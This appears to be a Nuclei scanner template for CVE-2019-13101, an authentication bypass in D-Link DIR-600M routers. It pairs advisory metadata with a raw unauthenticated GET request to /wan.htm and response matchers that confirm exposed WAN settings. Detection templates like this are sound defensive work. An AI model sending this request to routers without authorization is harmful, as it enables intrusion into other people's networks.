49 lines
1.8 KiB
YAML
49 lines
1.8 KiB
YAML
id: CVE-2019-13101
|
|
|
|
info:
|
|
name: D-Link DIR-600M - Authentication Bypass
|
|
author: Suman_Kar
|
|
severity: critical
|
|
description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page.
|
|
impact: |
|
|
An attacker can bypass authentication and gain unauthorized access to the router's settings, potentially leading to further compromise of the network.
|
|
remediation: |
|
|
Update the router's firmware to the latest version provided by D-Link.
|
|
reference:
|
|
- https://github.com/d0x0/D-Link-DIR-600M
|
|
- https://www.exploit-db.com/exploits/47250
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-13101
|
|
- https://us.dlink.com/en/security-advisory
|
|
- http://packetstormsecurity.com/files/153994/D-Link-DIR-600M-Wireless-N-150-Home-Router-Access-Bypass.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2019-13101
|
|
cwe-id: CWE-306
|
|
epss-score: 0.0359
|
|
epss-percentile: 0.90639
|
|
cpe: cpe:2.3:o:dlink:dir-600m_firmware:3.02:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: dlink
|
|
product: dir-600m_firmware
|
|
tags: packetstorm,edb,cve,cve2019,dlink,router,iot
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /wan.htm HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Origin: {{BaseURL}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "/PPPoE/"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100ec2f13b854bf27c8b3336db44b22160fbfdbc4b3eff270c08ec5f93ad6c72ed8022100aa00257d467d3cd9434c6138d1055ea399dfb80bdb6091173b89bda6e463f5a8:922c64590222798bb761d5b6d8e72950 |